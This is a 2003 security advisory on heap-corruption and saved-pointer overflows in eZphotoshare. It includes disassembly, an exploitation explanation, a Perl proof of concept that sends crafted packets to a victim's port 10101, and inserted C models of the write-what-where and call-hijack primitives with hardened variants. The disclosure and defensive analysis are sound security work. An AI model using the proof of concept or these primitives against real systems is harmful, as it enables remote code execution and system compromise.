ezphotoshare.txt

04 Dec 2003 00:00:00 | Reported by Peter Winter-Smith | Type: packetstorm | Source: packetstormsecurity.com

eZphotoshare has multiple overflow vulnerabilities allowing remote code execution and memory overwrite.
eZphotoshare Multiple Overflow Vulnerabilities
  
##############################################  
  
Credit:  
Author : Peter Winter-Smith  
  
Software:  
Package : eZphotoshare  
Versions : All up to and including the latest version
Vendor : eZnetwork  
Vendor Url : http://www.ezphotoshare.com/  
  
Vulnerability:  
Bug Type : Multiple *Interesting* Overflows  
Severity : Moderately/Highly Critical  
+ Code Execution with Application Privileges  
+ Arbitrary Memory can be Overwritten  
  
1. Description of Software  
  
"eZphotoshare is an amazing new way to share Digital Photos over the Internet
with friends and family. Seeing is believing, download it today and
interactively share digital photos anytime, anywhere. It's FREE for home use."
- Vendor's Description
  
2. Bug Information  
  
(a). Heap Corruption Vulnerability

By sending a packet of data of length 80 bytes to eZphotoshare on port 10101
exactly eight times in a row, it is possible to control the eax and ecx
registers at the point where they are loaded from the esi pointer: the
overflow corrupts the forward and backward link pointers of a free heap block,
and those two dwords are taken straight from our packet.

The code that consumes the corrupted pointers lies in the RtlAllocateHeap
function in the module 'ntdll.dll' and is shown below. The overflow itself is
in eZphotoshare's handling of the packet; ntdll merely unlinks the free block
it is handed, trusting the links it finds there:
  
  
:77F580C9 mov eax, dword ptr [esi+08]      ; eax contains our arbitrary dword
                                          ; of data
:77F580CC mov dword ptr [ebp+FFFFFF64], eax
:77F580D2 mov ecx, dword ptr [esi+0C]      ; ecx contains the next arbitrary
                                          ; dword of data which we supply
:77F580D5 mov dword ptr [ebp+FFFFFF60], ecx
:77F580DB mov dword ptr [ecx], eax         ; write the contents of eax to the
                                          ; address referenced by ecx!
  
  
The packet structure should be as follows:

$packet = "GET /aaa" . $eax . $ecx . "a"x64;

Where $eax and $ecx are exactly four bytes in length (80 bytes in total).

This type of flaw could, amongst other things, allow a remote attacker to
overwrite a saved return address on the target system and thus open the
possibility of remote code execution with the privileges of the user running
the application.
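The two loads and the store quoted above are the first half of the standard doubly-linked free-list unlink: [esi+08] is the block's forward link (FLINK), [esi+0C] its backward link (BLINK), and a complete unlink also performs the mirror store `mov [eax+4], ecx`, which the advisory's listing stops short of. The C model below is an added example, not code from the advisory or from eZphotoshare: the entry layout, the `victim` and `shellcode` stand-ins, the function names, the little-endian packet builder and the `unlink_safe` check (a link-consistency test of the kind Microsoft later added to the Windows heap) are all assumptions of this example. It shows why controlling both dwords yields a write-what-where, why the value chosen for eax must itself be writable memory, and how the consistency check defeats the attack.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Free-list entry as the ntdll listing reads it: 8 header bytes, then
 * FLINK at +08 and BLINK at +0C (field names are this example's assumption). */
struct free_entry {
    uint8_t   header[8];
    uintptr_t flink;   /* loaded into eax */
    uintptr_t blink;   /* loaded into ecx */
};

/* Something worth overwriting: a saved return address, padded so the safe
 * unlink below can read a whole entry through it without running off the end. */
struct victim {
    uintptr_t saved_ret;
    uintptr_t pad[3];
};

/* Stand-in for attacker code; word-sized so the stores below stay aligned. */
static uintptr_t shellcode[8];

/* The unlink exactly as quoted, plus its mirror store:
 *   mov eax,[esi+08] ; mov ecx,[esi+0C] ; mov [ecx],eax ; mov [eax+4],ecx
 * (+4 is one pointer width; sizeof(uintptr_t) keeps the model right on 64-bit). */
static void unlink_unsafe(struct free_entry *e)
{
    uintptr_t eax = e->flink;
    uintptr_t ecx = e->blink;
    *(uintptr_t *)ecx = eax;                         /* mov [ecx], eax   */
    *(uintptr_t *)(eax + sizeof(uintptr_t)) = ecx;   /* mov [eax+4], ecx */
}

/* Hardened unlink: refuse unless both neighbours still point back at us.
 * Attacker-chosen flink/blink values do not satisfy this. */
static bool unlink_safe(struct free_entry *e)
{
    const struct free_entry *f = (const struct free_entry *)e->flink;
    const struct free_entry *b = (const struct free_entry *)e->blink;
    if (f->blink != (uintptr_t)e || b->flink != (uintptr_t)e)
        return false;                                /* corrupted list: abort */
    unlink_unsafe(e);
    return true;
}

/* Lay out the advisory's 80-byte packet: "GET /aaa", then eax and ecx as
 * little-endian dwords (x86 in-memory order), then 64 filler bytes. */
size_t build_packet(uint8_t out[80], uint32_t eax, uint32_t ecx)
{
    memcpy(out, "GET /aaa", 8);
    for (int i = 0; i < 4; i++) {
        out[8 + i]  = (uint8_t)(eax >> (8 * i));
        out[12 + i] = (uint8_t)(ecx >> (8 * i));
    }
    memset(out + 16, 'a', 64);
    return 80;
}

/* Byte i of the packet for a given pair, for checking the layout. */
uint8_t packet_byte(uint32_t eax, uint32_t ecx, size_t i)
{
    uint8_t p[80];
    build_packet(p, eax, ecx);
    return p[i];
}

/* Play a corrupted entry through either unlink.  Returns true if the saved
 * return address now points at the "shellcode". */
bool demo_overwrite(bool use_safe_unlink)
{
    struct victim v = { .saved_ret = 0x41414141u, .pad = {0} };
    struct free_entry e;
    memset(&e, 0, sizeof e);
    memset(shellcode, 0x90, sizeof shellcode);       /* NOP sled stand-in */

    e.flink = (uintptr_t)shellcode;      /* $eax: the value that gets written */
    e.blink = (uintptr_t)&v.saved_ret;   /* $ecx: the address it is written to */

    if (use_safe_unlink) {
        if (!unlink_safe(&e))
            return false;
    } else {
        unlink_unsafe(&e);  /* also clobbers shellcode[1] with &v.saved_ret, so
                               real shellcode has to jump over that slot */
    }
    return v.saved_ret == (uintptr_t)shellcode;
}
```

The mirror store is the practical caveat: eax must be an address the process can write to, and the dword just past it is destroyed, which is why shellcode placed there conventionally opens with a short jump over its own first bytes.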
  
  
(b). Overwriting of Important Saved Values

By sending an overly long packet of data to eZphotoshare on port 10101 it is
possible to overwrite some important saved values in memory which can be
crafted to lead to complete control over the instruction pointer.
  
The code that consumes the overwritten value lies in 'mfc42.dll' (the overflow
itself is in eZphotoshare's packet handling) and is shown below:


:73DD1C3D mov edi, dword ptr [ebp+08]      ; [ebp+08] points to a pointer to
                                          ; our user supplied data

...

:73DD1C62 push [ebp+18]
:73DD1C65 mov eax, dword ptr [edi]         ; the value pointed at by edi comes
                                          ; directly from our user supplied
                                          ; data, so eax now contains anything
                                          ; we wish it to (even nulls!)

...

:73DD1C6D FF90A0000000 call dword ptr [eax+000000A0]  ; whammo!

Execution flow is directed to the address stored at eax plus a0h. To gain
control of the instruction pointer we just need to point eax at an address
which, a0h bytes further on, holds the value we would like in eip (that is,
eax is the address of our pointer minus a0h), and we have full control of the
eip register!
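The dispatch above is an attacker-controlled object pointer feeding an indirect call: whatever dword sits in our data becomes eax, and the call target is read from eax+a0h. The C model below is an added example, not the advisory's or eZphotoshare's code; `dispatch_trusting`, the payload function, the buffer layout and the handle-table alternative are assumptions of this example. It carries out the arithmetic the advisory describes (store the desired target in our buffer and set the object pointer to that slot's address minus a0h), and shows one way a dispatcher avoids the problem: look the object up by an index it validates instead of trusting a raw pointer from the wire.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SLOT_OFFSET 0xA0u   /* the a0h in "call dword ptr [eax+000000A0]" */
#define NWORDS      64      /* words in the attacker-controlled buffer */

typedef void (*handler_fn)(void);

static int payload_hits;
static void attacker_payload(void) { payload_hits++; }   /* stand-in for shellcode */

/* The mfc42 sequence modelled in C: eax = first word of our data; call [eax+A0h]. */
void dispatch_trusting(const uintptr_t *user_data)
{
    uintptr_t eax = user_data[0];                            /* mov eax, [edi]   */
    handler_fn fn = *(handler_fn *)(eax + SLOT_OFFSET);      /* call [eax+A0h]   */
    fn();
}

/* Build the buffer the advisory describes: put the address we want executed in
 * some slot, then make word 0 point SLOT_OFFSET bytes *before* that slot so
 * that [eax+A0h] lands exactly on it.  buf must hold NWORDS words. */
void build_fake_object(uintptr_t *buf, handler_fn target)
{
    const size_t target_slot = 40;   /* 40 words >= 0xA0 bytes on 32- and 64-bit */
    memset(buf, 0, NWORDS * sizeof *buf);
    buf[target_slot] = (uintptr_t)target;
    buf[0] = (uintptr_t)&buf[target_slot] - SLOT_OFFSET;    /* "subtract a0h" */
}

/* Returns how many times the payload ran: 1 means eip was ours. */
int run_trusting_demo(void)
{
    uintptr_t buf[NWORDS];
    payload_hits = 0;
    build_fake_object(buf, attacker_payload);
    dispatch_trusting(buf);
    return payload_hits;
}

/* Hardened dispatcher: the wire carries a handle (index), never a pointer.
 * Objects live in a table the program owns and the index is range-checked. */
struct session { handler_fn on_packet; };
static void benign_handler(void) { }
static struct session sessions[4] = {
    { benign_handler }, { benign_handler }, { benign_handler }, { benign_handler }
};

bool dispatch_by_handle(const uintptr_t *user_data)
{
    uintptr_t idx = user_data[0];
    if (idx >= sizeof sessions / sizeof sessions[0])
        return false;                      /* reject instead of dereferencing */
    sessions[idx].on_packet();
    return true;
}

/* Same hostile buffer against the hardened dispatcher: word 0 is a pointer-sized
 * "index" far beyond the table, so nothing is called and the payload never runs. */
int run_checked_demo(void)
{
    uintptr_t buf[NWORDS];
    payload_hits = 0;
    build_fake_object(buf, attacker_payload);
    (void)dispatch_by_handle(buf);
    return payload_hits;
}
```

Note that the hardened form is not "validate the pointer": there is no cheap test that a pointer read from the network points at a genuine object, which is why the fix changes the interface to an index the program resolves itself.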
  
  
Exploitation Notes:

I have been able to execute code through the flaws found in eZphotoshare,
despite the apparent complications which arise when it comes to exploitation,
and therefore I would urge you to take measures to protect your systems if you
use this software, whatever those measures may be.
  
3. Proof of Concept Code

I have decided not to release my remote code execution exploits for the
mentioned flaws until the vendor has had a fair amount of time to patch their
software. Instead I am going to release proof of concept code which will
demonstrate the heap corruption vulnerability.

I am not going to release code for the Important Value Overwrite vulnerability,
since it is pretty straightforward to reproduce and is best just demonstrated
with netcat or the like.

For best results, attach the windbg utility to eZphotoshare before using this
proof of concept code, so that you can see the attack and its results in
realtime.
  
# ---------------------------------[eZpsheap.pl]--------------------------------
#
#!/usr/bin/perl -w
#
# Heap Corruption Vulnerability in eZphotoshare PoC
# - by Peter Winter-Smith [[email protected]]
#
# Sends the 80-byte packet ("GET /aaa" + 4 bytes for eax + 4 bytes for ecx +
# 64 filler bytes) to port 10101 eight times, reconnecting for each one.

use strict;
use IO::Socket;

if (!$ARGV[0]) {
    print "Usage: eZpsheap.pl <victim>\n\n";
    exit;
}

print "Heap Corruption PoC\n";

# These land in eax ([esi+08]) and ecx ([esi+0C]) during the unlink; the
# markers are chosen to be recognisable in the debugger when it faults.
my $eax = "ABCD";
my $ecx = "XXXX";
my $packet = "GET /aaa" . $eax . $ecx . "a" x 64;   # exactly 80 bytes

for (my $n = 1; $n < 9; $n++) {
    my $victim = IO::Socket::INET->new(Proto    => 'tcp',
                                       PeerAddr => $ARGV[0],
                                       PeerPort => 10101)
        or die "Unable to connect to $ARGV[0] on port 10101: $!\n";

    print $victim $packet;
    print " + Sending packet number $n of 8 ...\n";

    sleep(1);
    close($victim);
}

print "Done.\n";
exit;

# ------------------------------------------------------------------------------
  
  
4. Patches - Workarounds  
  
No known patches have been issued. Secunia often have pretty sufficient  
workarounds, so I would recommend that you check their 'solutions' on  
www.secunia.com if you want a professional opinion.  
  
5. Credits

The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not regard
any of the analysis to be 'set in stone', and that if investigating this flaw
you back trace the steps detailed earlier for yourself.

Greets and thanks to:
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm
crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick k.,
Joel J. and Martine.

Huge thanks to everyone who makes this industry as great as it is, and puts up
with all my ever so vague and technically questionable contributions ;o)
  
Brett Moore - Are you *trying* to break Microsoft? ;o) ;o(  
  
o This document should be mirrored at:  
- http://www.elitehaven.net/ezphotoshare.txt  
  
